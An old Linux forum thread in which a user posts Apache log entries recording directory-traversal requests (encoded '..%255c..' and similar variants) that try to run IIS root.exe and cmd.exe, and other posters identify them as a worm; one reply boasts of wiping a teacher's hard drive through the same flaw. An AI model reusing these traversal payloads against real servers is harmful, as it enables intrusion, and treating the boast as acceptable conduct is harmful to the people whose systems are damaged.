Page 1 of 3 123 LastLast
Results 1 to 10 of 21

Thread: Was my server attacked/hack attemted?

Hybrid View

  1. #1
    Guest

    Was my server attacked/hack attemted?

    I was browsing my logs this morning. Hadnt done it in a few, as I was gone for christmas. ANyway, I found this in my apache log. Is this a windows virus ?
    Code:
    61.156.171.194 - - [09/Dec/2001:17:48:42 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 293
    61.156.171.194 - - [09/Dec/2001:17:48:43 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 291
    61.156.171.194 - - [09/Dec/2001:17:48:45 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    61.156.171.194 - - [09/Dec/2001:17:48:48 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
    61.156.171.194 - - [09/Dec/2001:17:48:50 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
    61.156.171.194 - - [09/Dec/2001:17:48:52 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332
    61.156.171.194 - - [09/Dec/2001:17:48:54 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332
    61.156.171.194 - - [09/Dec/2001:17:48:55 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
    32/cmd.exe?/c+dir HTTP/1.0" 404 348
    61.156.171.194 - - [09/Dec/2001:17:48:57 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
    61.156.171.194 - - [09/Dec/2001:17:48:58 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
    61.156.171.194 - - [09/Dec/2001:17:49:00 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
    61.156.171.194 - - [09/Dec/2001:17:49:01 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
    61.156.171.194 - - [09/Dec/2001:17:49:02 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
    61.156.171.194 - - [09/Dec/2001:17:49:04 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
    61.156.171.194 - - [09/Dec/2001:17:49:05 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
    61.156.171.194 - - [09/Dec/2001:17:49:07 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
    Ideas anyone?

  2. #2

    Re: Was my server attacked/hack attemted?

    hey mountainman.
    i think that is code red.

  3. #3
    Guest

    Re: Was my server attacked/hack attemted?

    With an unpatched IIS, this would've allowed the attacker to execute commands on your conmputer: a friend of mine and myself once deleted our networking teacher's (whom we hated more than Windows) hard drive using this weakness. So yeah, someone tried to attack you, but no, they didn't succeed.

  4. #4
    Senior Member
    Join Date
    May 2001
    Posts
    472

    Re: Was my server attacked/hack attemted?

    Yes, you were attacked, but probably not maliciously.

  5. #5

    Re: Was my server attacked/hack attemted?

    It's an M$ I$$ worm. You can tell by its attempts to execute root.exe and cmd.exe. I get hit with them all the time.

  6. #6
    Guest

    Re: Was my server attacked/hack attemted?

    I figured it was either a virus or a really stupid script kiddie. Just goes to show ya I need to bone up more on my security. Thanks guys.

  7. #7
    Moderator
    Kind Mastermind
    stryder144's Avatar
    Join Date
    Aug 2001
    Location
    Denver, CO
    Posts
    2,924

    Re: Was my server attacked/hack attemted?


    a friend of mine and myself once deleted our networking teacher's (whom we hated more than Windows) hard drive using this weakness. *
    And you admit this publicly?

  8. #8
    Guest

    Re: Was my server attacked/hack attemted?


    And you admit this publicly?
    not smart... especially since anyone who looks around at ur homepage can find ur real name

  9. #9

    Re: Was my server attacked/hack attemted?

    Maybe it was several years ago. Can't really get hurt for that.

  10. #10
    Guest

    Re: Was my server attacked/hack attemted?

    is there a statute of limitations on cyber crime?

Similar Threads

  1. Is it ok to 'hack' commercial software for Linux?
    By Hamond in forum General Chat
    Replies: 25
    Last Post: 03-05-2002, 03:38 PM
  2. DVD hack poster vows to keep fighting
    By in forum General Chat
    Replies: 8
    Last Post: 02-02-2002, 01:53 AM
  3. Multiplayer Hack-like game?
    By kenshi in forum Linux - Software, Applications & Programming
    Replies: 13
    Last Post: 01-21-2002, 11:58 AM
  4. 2 Hack or Not 2 Hack
    By coltrane in forum Linux - Software, Applications & Programming
    Replies: 22
    Last Post: 01-11-2002, 12:50 AM
  5. RIAA Wants to Hack Your PC
    By JimH in forum General Chat
    Replies: 6
    Last Post: 10-16-2001, 04:18 PM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •